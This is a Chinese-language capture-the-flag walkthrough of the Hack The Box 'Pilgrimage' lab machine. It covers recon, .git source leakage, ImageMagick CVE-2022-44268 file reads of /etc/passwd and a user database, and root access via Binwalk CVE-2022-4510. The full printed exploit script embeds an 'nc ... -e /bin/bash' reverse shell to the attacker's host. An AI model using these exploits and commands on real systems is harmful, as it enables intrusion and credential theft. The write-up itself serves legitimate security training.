[HTB] Pilgrimage

First Post:

2023-07-15

Last Update:

2023-07-15

Word Count:

5.1k

Read Time:

26 min

girls_frontline

前言

虽然是HTB上easy难度的靶机，其实还是要有点难度的。主打的就是一个信息收集能力以及经验。值得尝试。

信息收集

nmap扫描

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.219                              
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 16:02 CST
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
                                                                                             
┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nmap -sV -sT -O -p22,80 10.10.11.219  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 16:07 CST
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 5.0 - 5.3 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.96 seconds

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nmap --script=vuln 10.10.11.219       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 16:08 CST
Stats: 0:06:37 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 16:15 (0:00:05 remaining)
Stats: 0:13:02 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.01% done; ETC: 16:22 (0:00:07 remaining)
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-fileupload-exploiter: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=pilgrimage.htb
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://pilgrimage.htb:80/
|     Form id: filename
|     Form action: /
|     
|     Path: http://pilgrimage.htb:80/dashboard.php
|     Form id: 
|     Form action: /login.php
|     
|     Path: http://pilgrimage.htb:80/register.php
|     Form id: 
|     Form action: /register.php
|     
|     Path: http://pilgrimage.htb:80/login.php
|     Form id: 
|_    Form action: /login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-enum: 
|   /login.php: Possible admin folder
|_  /.git/HEAD: Git folder

Nmap done: 1 IP address (1 host up) scanned in 1021.09 seconds

省流一下就是发现80和22端口开着，且网站的Git仓库没删。git信息收集这块是我们接下来肯定要考虑的步骤。

whatweb

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo whatweb http://10.10.11.219
http://10.10.11.219 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.10.11.219], RedirectLocation[http://pilgrimage.htb/], Title[301 Moved Permanently], nginx[1.18.0]
http://pilgrimage.htb/ [200 OK] Bootstrap, Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0], IP[10.10.11.219], JQuery, Script, Title[Pilgrimage - Shrink Your Images], nginx[1.18.0]

whatweb第一次扫的时候显示跳转，所以我们去hosts里把跳转地址http://pilgrimage.htb/给加上。网站大致的技术栈我们也了解了。

nikto

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nikto -h http://pilgrimage.htb    
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.219
+ Target Hostname:    pilgrimage.htb
+ Target Port:        80
+ Start Time:         2023-07-11 15:20:56 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Admin login page/section found.
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7973 requests: 6 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-07-11 16:18:44 (GMT8) (3468 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

因为有延迟的问题，可能会扫的很慢。但是好消息是还是给我们带来了有用信息：这一堆.git目录下的文件告诉我们网站所有者将网页服务上线时没把.git文件夹给删掉，这很可能导致源代码泄露，那我们之后就用工具给他下载下来看看。

web渗透

手动访问网站

既然nmap扫出了80端口的web网站，我们先登上去看看网站是啥情况。

19ee949fabd6903663fdc1d65567b9c1

网站实现的内容就是一个上传图片然后网页给你压缩并返回结果图片的链接。登录和注册页面没啥用，不涉及什么后台管理员登录页面。

了解了网站提供的服务，那他是怎么实现的呢？我们先google一下pilgrimage是不是一个通用的服务，发现并不是。那手动网页遍历就暂时没啥信息了，先回到之前我们发现的.git源码泄露这条路看看走不走得通吧。

.git源码泄露

我们直接使用GitHack这个工具对网站的git文件进行一个提取。

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ python3 ~/Tools/GitHack-master/GitHack.py http://pilgrimage.htb/.git
[+] Download and parse index file ...
[+] assets/bulletproof.php
[+] assets/css/animate.css
[+] assets/css/custom.css
[+] assets/css/flex-slider.css
[+] assets/css/fontawesome.css
[+] assets/css/owl.css
[+] assets/css/templatemo-woox-travel.css
[+] assets/images/banner-04.jpg
[+] assets/images/cta-bg.jpg
[+] assets/js/custom.js
[+] assets/js/isotope.js
[+] assets/js/isotope.min.js
[+] assets/js/owl-carousel.js
[+] assets/js/popup.js
[+] assets/js/tabs.js
[+] assets/webfonts/fa-brands-400.ttf
[+] assets/webfonts/fa-brands-400.woff2
[+] assets/webfonts/fa-regular-400.ttf
[+] assets/webfonts/fa-regular-400.woff2
[+] assets/webfonts/fa-solid-900.ttf
[+] assets/webfonts/fa-solid-900.woff2
[+] assets/webfonts/fa-v4compatibility.ttf
[+] assets/webfonts/fa-v4compatibility.woff2
[+] dashboard.php
[+] index.php
[+] login.php
[+] logout.php
[+] magick
[+] register.php
[+] vendor/bootstrap/css/bootstrap.min.css
[+] vendor/bootstrap/js/bootstrap.min.js
[+] vendor/jquery/jquery.js
[+] vendor/jquery/jquery.min.js
[+] vendor/jquery/jquery.min.map
[+] vendor/jquery/jquery.slim.js
[+] vendor/jquery/jquery.slim.min.js
[+] vendor/jquery/jquery.slim.min.map
[OK] assets/bulletproof.php
[OK] assets/css/custom.css
[OK] assets/css/flex-slider.css
[OK] assets/css/owl.css
[OK] assets/js/custom.js
[OK] assets/css/fontawesome.css
[OK] assets/images/cta-bg.jpg
[OK] assets/js/popup.js
[OK] assets/css/templatemo-woox-travel.css
[OK] assets/js/isotope.min.js
[OK] assets/js/isotope.js
[OK] assets/webfonts/fa-regular-400.woff2
[OK] assets/webfonts/fa-regular-400.ttf
[OK] assets/js/owl-carousel.js
[OK] assets/css/animate.css
[OK] dashboard.php
[OK] assets/webfonts/fa-v4compatibility.woff2
[OK] assets/webfonts/fa-v4compatibility.ttf
[OK] index.php
[OK] logout.php
[OK] login.php
[OK] assets/webfonts/fa-brands-400.woff2
[OK] register.php
[OK] vendor/bootstrap/css/bootstrap.min.css
[OK] vendor/bootstrap/js/bootstrap.min.js
[OK] vendor/jquery/jquery.min.js
[OK] assets/webfonts/fa-brands-400.ttf
[OK] assets/webfonts/fa-solid-900.woff2
[OK] vendor/jquery/jquery.slim.min.js
[OK] vendor/jquery/jquery.slim.min.map
[OK] vendor/jquery/jquery.js
[OK] vendor/jquery/jquery.min.map
[OK] assets/webfonts/fa-solid-900.ttf
[OK] vendor/jquery/jquery.slim.js
[OK] assets/js/tabs.js
[OK] assets/images/banner-04.jpg
[OK] magick

还是因为vpn连接的问题，下的好慢……不过好歹下载下来了，看看内容。

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ ll
total 26960
drwxr-xr-x 6 kali kali     4096 Jul 11 17:48 assets
-rw-r--r-- 1 kali kali     5538 Jul 11 17:48 dashboard.php
-rw-r--r-- 1 kali kali     9250 Jul 11 17:48 index.php
-rw-r--r-- 1 kali kali     6822 Jul 11 17:48 login.php
-rw-r--r-- 1 kali kali       98 Jul 11 17:48 logout.php
-rw-r--r-- 1 kali kali 27555008 Jul 11 18:35 magick
-rw-r--r-- 1 kali kali     6836 Jul 11 17:48 register.php
drwxr-xr-x 4 kali kali     4096 Jul 11 17:48 vendor

这么多文件，我们首先要看什么呢？当然是index.php了。因为我们想搞清楚网站图片压缩服务是怎么实现的，看看它的实现是否存在漏洞可以利用。所以我们肯定要先看这个

             <?php
session_start();
require_once "assets/bulletproof.php";

function isAuthenticated() {
  return json_encode(isset($_SESSION['user']));
}

function returnUsername() {
  return "\"" . $_SESSION['user'] . "\"";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  $image = new Bulletproof\Image($_FILES);
  if($image["toConvert"]) {
    $image->setLocation("/var/www/pilgrimage.htb/tmp");
    $image->setSize(100, 4000000);
    $image->setMime(array('png','jpeg'));
    $upload = $image->upload();
    if($upload) {
      $mime = ".png";
      $imagePath = $upload->getFullPath();
      if(mime_content_type($imagePath) === "image/jpeg") {
        $mime = ".jpeg";
      }
      $newname = uniqid();
      exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);
      unlink($upload->getFullPath());
      $upload_path = "http://pilgrimage.htb/shrunk/" . $newname . $mime;
      if(isset($_SESSION['user'])) {
        $db = new PDO('sqlite:/var/db/pilgrimage');
        $stmt = $db->prepare("INSERT INTO `images` (url,original,username) VALUES (?,?,?)");
        $stmt->execute(array($upload_path,$_FILES["toConvert"]["name"],$_SESSION['user']));
      }
      header("Location: /?message=" . $upload_path . "&status=success");
    }
    else {
      header("Location: /?message=Image shrink failed&status=fail");
    }
  }
  else {
    header("Location: /?message=Image shrink failed&status=fail");
  }
}

?>

文件开头就清晰的告诉了我们：exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);，网站服务用的是magick将图片缩小一半。刚好magick被我们下载下来了，我们直接看看magick的版本。

此外，除了使用的服务，它还贴心的告诉我们网站连接的数据的位置$db = new PDO('sqlite:/var/db/pilgrimage');。那我们之后肯定要想办法看看，说不定能获得用户的复用的登录凭证。

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

我们可以看到版本是ImageMagick 7.1.0-49，在exp-db搜一下是不是有可用的漏洞。发现确实有https://github.com/voidz0r/CVE-2022-44268。

Magick任意文件读取漏洞

验证PoC

此版本的magick存在任意文件读取的漏洞，PoC也介绍的很详细，我们尝试复现一下看看能不能成功利用这个PoC。

git clone https://github.com/voidz0r/CVE-2022-44268
cargo run "/etc/passwd"
此时会生成一张图片，我们直接把这张图片上传到目标网站，并把返回的图片下载下来。

然后我们就可以分析返回的图片了

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ identify -verbose output.png
Image: output.png
  Format: PNG (Portable Network Graphics)
  Geometry: 100x100
  Class: PseudoClass
  Type: palette
  Depth: 1 bits-per-pixel component
  Channel Depths:
    Red:      1 bits
    Green:    1 bits
    Blue:     1 bits
  Channel Statistics:
    Red:
      Minimum:                 65535.00 (1.0000)
      Maximum:                 65535.00 (1.0000)
      Mean:                    65535.00 (1.0000)
      Standard Deviation:          0.00 (0.0000)
    Green:
      Minimum:                     0.00 (0.0000)
      Maximum:                     0.00 (0.0000)
      Mean:                        0.00 (0.0000)
      Standard Deviation:          0.00 (0.0000)
    Blue:
      Minimum:                     0.00 (0.0000)
      Maximum:                     0.00 (0.0000)
      Mean:                        0.00 (0.0000)
      Standard Deviation:          0.00 (0.0000)
  Colors: 2
    0: (255,  0,  0)      red
    1: (255,255,255)      white
  Gamma: 0.45455
  Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
  Filesize: 1.1Ki
  Interlace: No
  Orientation: Unknown
  Background Color: #FEFEFE
  Border Color: #DFDFDF
  Matte Color: #BDBDBD
  Page geometry: 100x100+0+0
  Compose: Over
  Dispose: Undefined
  Iterations: 0
  Compression: Zip
  Png:IHDR.color-type-orig: 3
  Png:IHDR.bit-depth-orig: 1
  Raw profile type: 

    1437
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d
6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f
6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e
2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f736269
6e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f
62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d
65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a
2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a
783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f757372
2f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73
706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31
303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f
6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573
722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d
646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b
75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f
7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c69
7374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67
696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f73
62696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d
5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e
6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a3635353334
3a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e
2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374
656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f72
6b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d65
6e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e
0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d642052
65736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e65786973
74656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573
796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e69
7a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c
6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d
652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a78
3a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f
7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f
737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a393938
3a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a

  Date:create: 2023-07-11T12:39:40+00:00
  Date:modify: 2023-07-11T12:39:40+00:00
  Date:timestamp: 2023-07-11T12:39:40+00:00
  Signature: c7d03a3453434db9720fd67b559185125d9bdb1fe9c25c182783170e2ba6a8f6
  Tainted: False
  Elapsed Time: 0m:0.001572s
  Pixels Per Second: 6.1Mi

按照说明将其中的16进制数转换成字符看看结果

1
2
3

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ python3 -c 'print(bytes.fromhex("那一串hex数据"))'
b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:109::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nemily:x:1000:1000:emily,,,:/home/emily:/bin/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n_laurel:x:998:998::/var/log/laurel:/bin/false\n'

成功利用!

通过读取/etc/passwd我们不仅验证了漏洞的存在，还发现了系统中的一个用户emily。那接下来就是想办法搞到emily的密码。

当然首先想试试能不能直接读取shadow文件偷鸡，发现并不行。那只能寄希望于之前发现的数据库中能给我们点有用的信息了。

读数据库

步骤同上，就是把第二步改成cargo run "/var/db/pilgrimage"，再重复上面的步骤。当然第5步还是要改一改的。因为sqlite识别数据库文件需要是二进制的，所以我们给他转成二进制。这可以直接用linux自带的xxd实现（xxd -r -ps ）。

┌──(kali㉿kali)-[~/HTB/Pilgrimage] #返回的数据太长了，存在文件里方便处理
└─$ identify -verbose sql.png > sql
                                                         
┌──(kali㉿kali)-[~/HTB/Pilgrimage] #删掉除了16进制数据以外的其他东西
└─$ vim sql

┌──(kali㉿kali)-[~/HTB/Pilgrimage] #把数据转成二进制 r是hex转bin，ps表示以纯16进制转储
└─$ xxd -r -ps sql sql.db

数据处理完了，我们把它丢进sqlite3查看。

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sqlite3 sql.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .databases
main: /home/kali/HTB/Pilgrimage/sql.db r/w
sqlite> .table
images  users 
sqlite> select * from users
   ...> ;
emily|abigchonkyboi123
asd|asd
toto|toto
sqlite> .exit

发现users表中刚好有emily的密码，那我们肯定得试试能不能ssh登录系统。

获取立足点

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ ssh emily@10.10.11.219
emily@10.10.11.219's password: 
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
emily@pilgrimage:~$

成功登录，emily的home目录下就有可以拿到user flag。

提权

三板斧

上来先sudo -l ，没权限。找一找SUID文件，没发现。看一看crontab，没东西。得了，啥也没有。

手动浏览

四处查看，也没有看到什么特别的东西。

自动枚举

那只能上大招了，把linpeas.sh传上去看看结果。

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens                                                                                                      
ptrace protection is disabled (0), so sudo tokens could be abused         

Current user has other interactive shells running
    680 /bin/bash /usr/sbin/malwarescan.sh
    748 /bin/bash /usr/sbin/malwarescan.sh
   1420 /bin/sh ./linpeas.sh

其他没啥特别的，但是这一段值得我们看一下。首先我们查一下他这里说的sudo tokens有没有什么利用方案。查了一下发现背景是同一用户，不知道密码的情况，另一个终端15分钟内输入过sudo密码，当前终端就可以不用密码执行sudo命令。我们ps aux看了一下，发现malwarescan.sh是root用户运行的，并不能用到这个利用方式。

虽然没能利用，但是毕竟malwarescan.sh是root运行的一个shell脚本，我们去看看他的内容有没有什么可以利用来提权的点。

emily@pilgrimage:/usr/sbin$ cat malwarescan.sh 
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

内容很符合脚本名字，扫描文件，发现黑名单中的类型就删掉。

我们发现脚本中的二进制文件都很严谨的写了绝对路径，想利用PATH偷鸡的想法是走不通了。那这些二进制文件是否会存在漏洞可以供我们利用？一个看看吧，inotifywait主要是用来监控文件的，这里持续监控（-m）/var/www/pilgrimage.htb/shrunk/下文件的创建。查了一下没发现可以用来提权的方法。echo，tail和sed就不用看了。那最好只能看看binwalk有什么说法了，没有的话就要想想别的办法了。

我们先看看binwalk的版本。

emily@pilgrimage:/usr/sbin$ /usr/local/bin/binwalk -h

Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

binwalk提权

在exp-db上搜发现这个版本的binwalk确实存在RCE漏洞。

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ searchsploit binwalk 2.3.2
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Binwalk v2.3.2 - Remote Command Execution (RCE)            | python/remote/51249.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

搜了一下漏洞的成因是binwalk解析PFS文件时的防路径穿越代码存在问题，导致攻击者可以构造恶意文件直接进行路径穿越。当使用binwalk的-e选项对该恶意文件进行自动提取时，将触发漏洞，将攻击者构造的恶意文件中内嵌的文件写入提取目录之外的路径。这还可以导致远程代码执行。

将漏洞利用脚本下载下来看看。

┌──(kali㉿kali)-[~/Tools/AutoEnum]
└─$ cat 51249.py       
# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510
import os
import inspect
import argparse

print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)

args = parser.parse_args()

if args.file and args.ip and args.port:
    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
    lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n','    def init(self):\n','        if not os.path.exists("/tmp/.binwalk"):\n','            os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n','            with open("/tmp/.binwalk", "w") as f:\n','                f.write("1")\n','        else:\n','            os.remove("/tmp/.binwalk")\n', '            os.remove(os.path.abspath(__file__))\n','            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']

    in_file = open(args.file, "rb")
    data = in_file.read()
    in_file.close()

    with open("/tmp/plugin", "w") as f:
       for line in lines:
          f.write(line)

    with open("/tmp/plugin", "rb") as f:
        content = f.read()

    os.system("rm /tmp/plugin")

    with open("binwalk_exploit.png", "wb") as f:
        f.write(data)
        f.write(header_pfs)
        f.write(content)

    print("")
    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
    print("")

我们执行一下，在图片中嵌入漏洞利用的PFS。

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ python3 51249.py lena.png <HTB_VPN_IP> 443

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################


You can now rename and share binwalk_exploit and start your local netcat listener.

然后我们把文件传上去，直接传到/var/www/pilgrimage.htb/shrunk/可能脚本不会执行，不过我们复制过去的话就可以触发。

本地开个nc监听

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.219] 60606
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jul 12 17:24 .
drwx------ 5 root root 4096 Jun  8 00:10 ..
drwxr-xr-x 3 root root 4096 Jul 12 17:24 _exp.png.extracted
pwd
/root/quarantine
cd ..
ls -la
total 40
drwx------  5 root root 4096 Jun  8 00:10 .
drwxr-xr-x 18 root root 4096 Jun  8 00:10 ..
lrwxrwxrwx  1 root root    9 Feb 10 13:43 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 11  2021 .bashrc
drwxr-xr-x  3 root root 4096 Jun  8 00:10 .config
-rw-r--r--  1 root root   93 Jun  7 20:11 .gitconfig
drwxr-xr-x  3 root root 4096 Jun  8 00:10 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
drwxr-xr-x  3 root root 4096 Jul 12 17:24 quarantine
-rwxr-xr-x  1 root root  352 Jun  1 19:13 reset.sh
-rw-r-----  1 root root   33 Jul 12 15:37 root.txt
cat root.txt

拿下。root目录下有root flag。

总结

这台机子主要考察git源代码泄露的信息收集，对应服务漏洞的发现与利用，以及提权部分对可疑文件的分析与提权思路构建。总体来说还是要提高姿势水平，才能轻松应对。

≡